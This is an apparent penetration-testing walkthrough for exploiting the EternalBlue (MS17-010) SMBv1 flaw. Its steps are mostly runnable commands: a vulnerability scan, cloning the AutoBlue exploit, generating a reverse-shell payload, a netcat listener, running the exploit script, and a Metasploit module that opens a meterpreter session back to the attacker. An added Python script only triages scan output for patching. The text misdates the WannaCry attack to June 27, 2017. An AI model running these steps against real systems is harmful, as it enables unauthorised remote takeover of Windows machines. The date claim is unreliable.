# Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue)

## **MS17-010 EternalBlue Exploit**

* EternalBlue (MS17-010/CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
* The EternalBlue exploit was developed by the NSA (National Security Agency) to take advantage of the MS17-010 vulnerability and was leaked to the public by a hacker group called the Shadow Brokers in 2017.
* The EternalBlue exploit takes advantage of a vulnerability in the Windows SMBv1 protocol that allows attackers to send specially crafted packets that consequently facilitate the execution of arbitrary commands.
* The EternalBlue exploit was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.
* This vulnerability affects multiple versions of Windows:
  * Windows Vista
  * Windows 7
  * Windows Server 2008
  * Windows 8.1
  * Windows Server 2012
  * Windows 10
  * Windows Server 2016
* Microsoft released a patch for the vulnerability in March 2017; however, many users and companies have still not patched their systems.
* The EternalBlue exploit has an MSF auxiliary module that can be used to check if a target system is vulnerable to the exploit and also has an exploit module that can be used to exploit the vulnerability on unpatched systems.
* The EternalBlue exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system.
* In addition to MSF modules, we can also manually exploit the vulnerability by utilizing publicly available exploit code.

## Attack Flow for the Windows MS17-010 SMB Vulnerability (EternalBlue)

### 1. **Determine Vulnerability**

**Objective:** Identify if the target system is vulnerable to EternalBlue.

**Command:**

```bash
nmap -sV -O --script=smb-vuln-ms17-010 <Target_IP>
```

**Description:** Scan the target system to check for the MS17-010 vulnerability.
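As an added example that is not part of the original walkthrough: when the step 1 scan is written to XML with nmap's `-oX` option, the following Python script (function names are my own, the sample output is constructed) triages that file and lists the hosts whose `smb-vuln-ms17-010` result reads VULNERABLE, so they can be ticketed for the MS17-010 patch or SMBv1 removal. The `hostscript`/`script`/`table`/`elem` layout is assumed to follow nmap's vulns library formatting; the addresses are documentation placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX` output for three scanned hosts (placeholder addresses).
# Assumption: the hostscript/script/table/elem layout mirrors nmap's vulns library
# formatting for this NSE script; real files carry more attributes and a longer `output`.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="192.0.2.12" addrtype="ipv4"/></host>
</nmaprun>
"""

def ms17_010_status(xml_text):
    """Map each scanned IPv4 host to the script's state; 'NOT CHECKED' if it produced none."""
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        state = "NOT CHECKED"
        for script in host.iter("script"):
            if script.get("id") == "smb-vuln-ms17-010":
                # Prefer the structured state element; fall back to the script's output text.
                elem = script.find(".//elem[@key='state']")
                text = elem.text if elem is not None else script.get("output")
                state = (text or "").strip() or state
        results[addr.get("addr")] = state
    return results

def vulnerable_hosts(xml_text):
    """Hosts reported VULNERABLE or LIKELY VULNERABLE: patch MS17-010 or disable SMBv1."""
    return sorted(ip for ip, s in ms17_010_status(xml_text).items()
                  if "VULNERABLE" in s and not s.startswith("NOT"))
```

Hosts that come back as NOT CHECKED (SMB closed, filtered, or the script did not run) should be rescanned rather than assumed safe.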

### 2. **Clone the Exploit Repository**

**Objective:** Download the necessary exploit code for MS17-010.

**Command:**

```bash
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
```

**Description:** Clone the `AutoBlue-MS17-010` repository and navigate to its directory.

### 3. **Install Prerequisites**

**Objective:** Install the required dependencies for the exploit tool.

**Command:**

```bash
sudo pip install -r requirements.txt
```

**Description:** Use the provided `requirements.txt` file to install necessary Python packages.

### 4. **Generate the Shell Payload**

**Objective:** Create a reverse shell payload for exploitation.

**Command:**

```bash
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
```

**Description:** Navigate to the `shellcode` folder, make `shell_prep.sh` executable, and run it to generate the shell payload using `msfvenom`.

**Inside `shell_prep.sh`:**

* **Set LHOST and LPORT values.**
* **Generate a regular cmd shell.**
* **Choose to create a stageless payload.**

### 5. **Set Up NetCat Listener**

**Objective:** Prepare to receive the reverse shell connection.

**Command:**

```bash
nc -nvlp <LPORT>
```

**Description:** Start a NetCat listener on the specified port to capture the reverse shell.

### 6. **Execute the Exploit**

**Objective:** Run the EternalBlue exploit code to establish a reverse shell.

**Command:**

```bash
cd ..
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py <Target_IP> shellcode/sc_x64
```

**Description:** Navigate back to the main repository folder, make the exploit script executable, and run it to exploit the target and establish a reverse shell connection.

### 7. **Alternative Method Using Metasploit**

**Objective:** Use Metasploit to exploit the MS17-010 vulnerability.

**Command:**

```bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <Target_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit
```

**Description:** Use the `ms17_010_eternalblue` module in Metasploit to exploit the target system and establish a Meterpreter session.

***

**`Hacker's Mantra:`** "If hackers, if anyone committing a criminal act, wants to reduce their risk, they obviously don't involve anybody else. The greater the circle of people that know what you're doing, the higher the risk." - Kevin Mitnick
